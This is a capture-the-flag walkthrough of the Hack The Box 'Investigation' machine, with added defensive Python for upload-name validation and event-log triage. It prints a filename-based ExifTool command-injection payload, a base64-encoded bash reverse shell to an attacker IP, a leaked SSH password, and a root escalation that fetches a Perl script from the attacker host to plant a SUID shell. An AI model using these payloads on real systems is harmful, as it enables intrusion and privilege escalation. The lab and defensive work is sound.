HTB — Investigation

Niraj Kharel
8 min read · Apr 23, 2023


A detailed walkthrough of the Investigation box on Hack The Box. The box involves a command injection in ExifTool, credentials leaked in Windows Event Logs for the user step, and some reverse engineering for privilege escalation.

Enumeration

NMAP

nmap -sC -sV -oA nmap/10.10.11.197 10.10.11.197 -vv
PORT   STATE SERVICE REASON  VERSION
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 2f:1e:63:06:aa:6e:bb:cc:0d:19:d4:15:26:74:c6:d9 (RSA)
| ssh-rsa
| 256 27:45:20:ad:d2:fa:a7:3a:83:73:d9:7c:79:ab:f3:0b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBG5ZpYGYsM/eNsAOYy3iQ9O7/OdK6q63GKK1bd2ZA5qhePdO+KJOOvgwxKxBXoJApVfBKV0oVn3ztPubO2mdp5g=
| 256 42:45:eb:91:6e:21:02:06:17:b2:74:8b:c5:83:4f:e0 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ4m4ta/VBtbCv+5FEPfydbXySZHyzU7ELt9lBsbjl5S
80/tcp open http syn-ack Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://eforenzics.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Service Info: Host: eforenzics.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add eforenzics.htb to /etc/hosts. Open http://eforenzics.htb/ in a web browser and view the application.

Directory Enumeration

The application appears to be a platform for performing forensics on images.

Click the Go button shown in the image above and we are forwarded to the /service.html page. We can see that we are allowed to upload JPG images, and a detailed forensic analysis of the image is provided.

Let's upload a random JPG image to see how the forensics is performed.

The image is uploaded successfully and the path to the upload is provided. Click the link labelled here, as shown in the web page below.

We find that the application uses a tool called ExifTool to dump the information from the JPG file.

The ExifTool version is 12.37. Let's see if this version is vulnerable. ExifTool 12.37 is vulnerable to command injection (CVE-2022-23935).

We can find more information about the vulnerability on https://gist.github.com/ert-plus/1414276e4cb5d56dd431c2f0429e4429

According to the vulnerability description in the reference above, “Exiftool versions < 12.38 are vulnerable to Command Injection through a crafted filename. If the filename passed to exiftool ends with a pipe character | and exists on the filesystem, then the file will be treated as a pipe and executed as an OS command.”
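The root cause is Perl's two-argument open(), which treats a name ending in | (or starting with <, >, >>, +< or |) as a mode or pipe specification rather than a path. The fix is to run ExifTool 12.38 or later, but an upload handler should never let a client-chosen name reach ExifTool in the first place. The following Python is an added defensive example, not code from the walkthrough, the box or ExifTool: it rejects names with that shape, always generates the on-disk name itself, builds the ExifTool argv without a shell, and runs the same check over upload log lines so an analyst can spot names of the kind used later in this article. The log lines, reason strings and function names are constructed for the example.

```python
import os
import re
import secrets

# Name shapes that Perl's two-argument open() (used by ExifTool < 12.38 for
# input files) interprets as modes or pipes instead of plain paths: a trailing
# "|" runs the name as a command (CVE-2022-23935); a leading "<", ">", ">>",
# "+<" or "|" selects read/write/append/pipe modes.
PERL_OPEN_MAGIC = re.compile(r"^\s*(?:<|>>?|\+<|\|)|\|\s*$")
SHELL_META = re.compile(r"[;&|`$(){}<>\n]")
ALLOWED_EXT = {"jpg", "jpeg"}
MAX_NAME_LEN = 255


def classify_upload_name(name):
    """Return the list of reasons a client-supplied filename must be rejected.
    An empty list means the name is acceptable to log; it is still never used
    as the on-disk name (see storage_name)."""
    reasons = []
    if os.path.basename(name) != name or name in ("", ".", ".."):
        reasons.append("path component or empty name")
    if len(name) > MAX_NAME_LEN:
        reasons.append("name too long")
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    if ext not in ALLOWED_EXT:
        reasons.append("extension not allowed")
    if PERL_OPEN_MAGIC.search(name):
        reasons.append("perl open() magic (pipe/redirect) in name")
    if SHELL_META.search(name):
        reasons.append("shell metacharacters in name")
    if any(ord(c) < 32 for c in name):
        reasons.append("control characters in name")
    return reasons


def storage_name(client_name):
    """Choose the on-disk name ourselves: a random token plus the validated
    extension. Even a patched ExifTool should never see an attacker-chosen name."""
    reasons = classify_upload_name(client_name)
    if reasons:
        raise ValueError("rejected upload name: " + ", ".join(reasons))
    ext = client_name.rsplit(".", 1)[-1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


def exiftool_argv(stored_path):
    """argv for the analysis step: no shell, and a "./"-prefixed relative path so
    the name cannot be parsed as an option. This alone does NOT stop
    CVE-2022-23935 (the pipe handling happens inside Perl's open()), which is
    why the name is generated above and ExifTool must be >= 12.38."""
    path = stored_path if os.path.isabs(stored_path) else "./" + stored_path
    return ["exiftool", "-j", path]


# Constructed application log lines (not from the box) in which the upload
# handler records the client-supplied name. The third entry has the shape of
# the filenames used in this walkthrough; 'aWQK' is base64 for "id".
SAMPLE_UPLOAD_LOG = [
    "2023-04-20T10:00:01Z upload ip=198.51.100.7 name=\"index.jpeg\"",
    "2023-04-20T10:00:09Z upload ip=198.51.100.7 name=\"holiday photo.jpg\"",
    "2023-04-20T10:01:33Z upload ip=198.51.100.7 name=\"echo 'aWQK'|base64 -d|bash |\"",
    "2023-04-20T10:02:10Z upload ip=203.0.113.9 name=\"../../etc/cron.d/x.jpg\"",
]
LOG_NAME = re.compile(r'name="(.*)"$')


def scan_upload_log(lines):
    """Re-run the filename check over recorded uploads; returns (name, reasons)."""
    findings = []
    for line in lines:
        m = LOG_NAME.search(line)
        if not m:
            continue
        reasons = classify_upload_name(m.group(1))
        if reasons:
            findings.append((m.group(1), reasons))
    return findings


if __name__ == "__main__":
    print(storage_name("index.jpeg"), exiftool_argv("a1.jpg"))
    for name, reasons in scan_upload_log(SAMPLE_UPLOAD_LOG):
        print(f"suspicious upload name {name!r}: {', '.join(reasons)}")
```

The detection half is deliberately the same function as the validation half: a name that the handler would refuse today is exactly the name worth hunting for in yesterday's logs.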

Vulnerability Confirmation

Let's confirm the vulnerability using the ping command. If we receive ICMP traffic on our attacker machine, we can confirm that the command injection vulnerability exists in the application and proceed further to a reverse shell.

As described in the exploit https://github.com/dpbe32/CVE-2022-23935-PoC-Exploit/blob/main/exploit.sh, we need to base64-encode the command that goes into the file name.

The payload would look like:

mv index.jpeg "echo $(echo 'ping 10.10.14.14 -c4'|base64) | base64 -d |bash |"

Listen for ICMP traffic on your attacker machine and upload the file with the base64-encoded filename.

sudo tcpdump -i tun0 icmp

Once the image file is uploaded, navigate to the hyperlink here.

Since we receive the ICMP requests from the box, we can confirm that the vulnerability exists in the application.

Exploitation

Base64-encode your bash reverse shell payload.

echo 'bash -i >& /dev/tcp/10.10.14.14/4444 0>&1'|base64

Rename the file with the payload.

mv index.jpeg "echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xNC80NDQ0IDA+JjEK'|base64 -d|bash |"

Listen on port 4444 and upload the file.

nc -lvnp 4444

As soon as you hit the upload button, we receive the reverse shell.

Escalation to user

We need to escalate to the user smorton to get the user.txt file.

Download and run linpeas.

Nothing interesting was found by linpeas.

Search for files and directories whose names contain investigation. After all, this box is all about investigation. I found a directory /usr/local/investigation.

Navigate into that directory. We can see a file called Windows Event Logs for Analysis.msg

Download the file to the attacker machine for analysis.

The Windows Event Log records every incident or event occurring on the system. Let's see if we can find an online decoder that provides more information about the file. I found an online file converter for the MSG file type. Upload and convert the document using the link below.

https://www.zamzar.com/converters/document/msg/

Once converted, a security.evtx file is downloaded.

EVTX is the Windows Event Log file format, in which the logs are stored in binary form and can be viewed with the Windows Event Viewer application. The Security log records various types of events, including successful and unsuccessful logon attempts and activities related to resource management such as creating, opening, or removing files or other objects.

Since I was on Linux, I needed to find another application that can parse the event data from the log.

The command-line tool evtx by omerbenamram parses the records into different formats (XML, JSON) and has binaries for different platforms such as Linux and macOS.

Download the binary, rename it to evtx_dump, and make it executable.

chmod +x evtx_dump

Parse the records and store them in an XML file.

./evtx_dump security.evtx > securityevents.xml

Viewing the log file, we can find an EventID for each record. As per the Microsoft docs, “Event identifiers uniquely identify a particular event. Each event source can define its own numbered events and the description strings to which they are mapped in its message file.” Therefore, there should be a unique event ID for each defined event.

Analyzing the log file, there is an event where a user may have entered the password in the username field while logging in.

We can get the list of usernames from the log file with a grep command. Some of the extracted usernames are: AAnderson, SMorton, Administrators, LJenkins, Administrator, AWright, BMay, EKora, HMarley, IPerez, JClark, KTyson, LMonroe.
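Rather than grepping by hand, the same triage can be scripted. The following Python is an added example (not part of the original walkthrough and not the evtx tool's own code): it parses evtx_dump-style output, counts the event IDs present, lists the TargetUserName values from logon events (4624 success, 4625 failure), and flags failed logons whose username does not look like an account name at all, which is the “password typed into the username field” pattern described above. The records are constructed, the password-like value is invented, and the assumed layout is evtx_dump's default output (a “Record N” line followed by one XML document per event).

```python
import re
import xml.etree.ElementTree as ET

# Namespace carried by every Windows event record.
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed sample in the shape of evtx_dump's default output. Names and
# timestamps are made up; the odd TargetUserName in Record 3 stands in for a
# password typed into the username field.
SAMPLE_DUMP = """\
Record 1
<?xml version="1.0" encoding="utf-8"?>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4624</EventID><TimeCreated SystemTime="2022-08-01T08:00:00Z"/></System>
  <EventData><Data Name="TargetUserName">AAnderson</Data><Data Name="LogonType">2</Data></EventData>
</Event>
Record 2
<?xml version="1.0" encoding="utf-8"?>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4625</EventID><TimeCreated SystemTime="2022-08-01T08:01:10Z"/></System>
  <EventData><Data Name="TargetUserName">SMorton</Data><Data Name="LogonType">2</Data></EventData>
</Event>
Record 3
<?xml version="1.0" encoding="utf-8"?>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4625</EventID><TimeCreated SystemTime="2022-08-01T08:01:25Z"/></System>
  <EventData><Data Name="TargetUserName">S3cr3t!Passw0rd#1</Data><Data Name="LogonType">2</Data></EventData>
</Event>
Record 4
<?xml version="1.0" encoding="utf-8"?>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4672</EventID><TimeCreated SystemTime="2022-08-01T08:02:00Z"/></System>
  <EventData><Data Name="SubjectUserName">Administrator</Data></EventData>
</Event>
"""

RECORD_HEADER = re.compile(r"^Record (\d+)\s*$", re.MULTILINE)
XML_DECL = re.compile(r"<\?xml[^>]*\?>")
# SAM-style account names (optional trailing $ for machine accounts) and UPNs.
SAM_NAME = re.compile(r"^[A-Za-z0-9._-]{1,20}\$?$")
UPN_NAME = re.compile(r"^[A-Za-z0-9._-]+@[A-Za-z0-9.-]+$")
LOGON_EVENTS = {"4624", "4625"}


def split_records(dump_text):
    """Yield (record_number, xml_text) pairs from evtx_dump output."""
    parts = RECORD_HEADER.split(dump_text)  # [preamble, num1, xml1, num2, xml2, ...]
    for i in range(1, len(parts) - 1, 2):
        yield int(parts[i]), XML_DECL.sub("", parts[i + 1]).strip()


def parse_event(record_no, xml_text):
    """Reduce one Event element to a flat dict of the fields we care about."""
    root = ET.fromstring(xml_text)
    time_el = root.find("e:System/e:TimeCreated", NS)
    data = {d.get("Name"): (d.text or "") for d in root.findall("e:EventData/e:Data", NS)}
    return {
        "record": record_no,
        "event_id": root.findtext("e:System/e:EventID", namespaces=NS),
        "time": time_el.get("SystemTime") if time_el is not None else None,
        "data": data,
    }


def load_events(dump_text):
    return [parse_event(n, x) for n, x in split_records(dump_text)]


def event_id_counts(events):
    """Which event IDs appear, and how often: the first thing to look at."""
    counts = {}
    for ev in events:
        counts[ev["event_id"]] = counts.get(ev["event_id"], 0) + 1
    return counts


def logon_usernames(events):
    """Sorted distinct TargetUserName values from logon success/failure events."""
    names = {ev["data"].get("TargetUserName") for ev in events if ev["event_id"] in LOGON_EVENTS}
    return sorted(n for n in names if n)


def suspicious_usernames(events):
    """Failed logons (4625) whose TargetUserName does not look like an account.
    A value full of punctuation is the classic sign of a password typed into the
    username field; treat it as a leaked credential to be rotated."""
    hits = []
    for ev in events:
        name = ev["data"].get("TargetUserName", "")
        if ev["event_id"] == "4625" and not (SAM_NAME.match(name) or UPN_NAME.match(name)):
            hits.append((ev["record"], ev["time"], name))
    return hits


if __name__ == "__main__":
    evs = load_events(SAMPLE_DUMP)
    print(event_id_counts(evs))
    print(logon_usernames(evs))
    for rec, ts, name in suspicious_usernames(evs):
        print(f"record {rec} at {ts}: non-account-like username {name!r}")
```

Run it against the real dump with load_events(open("securityevents.xml").read()). Event ID 4625 is the one to concentrate on: a mistyped logon fails, and the Security log stores the failed attempt's username field verbatim, so anything the user typed into the wrong box ends up in cleartext in the record.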

But since we already know the user on the box is smorton, SSH in as smorton with the password Def@ultf0r3nz!csPa$$.

And the user flag is obtained.

Privilege Escalation

Looking at the output of sudo -l, we can see that the user smorton is allowed to run /usr/bin/binary as root.

Run the binary with sudo. It just exits.

Viewing the file type, we can see that it is a 64-bit ELF executable. Maybe we need some analysis here.

Download the file to your local machine.

There is a tool called ELF Parser, which can be used to determine the capabilities of an ELF binary through static analysis.

Install ELF Parser on your machine and open the binary file.

We can see that the binary has the capability to open files, close files, and execute shell commands. But there is no further useful information from this parser.

It’s time to perform some reverse engineering using Ghidra. Open the binary file with Ghidra.

Double-click the binary file and the Ghidra tool will run.

We can find the decompiled source code here.

On viewing the source code, we find that the main function of the binary takes two parameters (the argument count and the argument vector). If the argument count is not 3, the program exits.

Also, if the program is run without sudo (i.e. not as root), it exits. Finally, the program checks whether the second argument contains “lDnxUysaQn”. If not, the program exits.

If those conditions are satisfied, the program opens the file lDnxUysaQn in write-binary (wb) mode, runs curl with the first argument as the URL, writes the curl response into the file lDnxUysaQn, executes that file with perl, and finally deletes it.

Create a Perl script, cmd.pl, which copies /bin/bash to /tmp/bash and sets the SUID bit on it:

system("cp /bin/bash /tmp/bash; chmod +s /tmp/bash");

Host the script on your attacker machine.

python3 -m http.server 1337

Inside the box, run the binary with the arguments below.

sudo /usr/bin/binary <Attacker-IP>:1337/cmd.pl lDnxUysaQn

Run the copied bash binary with the -p flag so it keeps the effective root privileges.

/tmp/bash -p

Here you go. Happy Hacking!
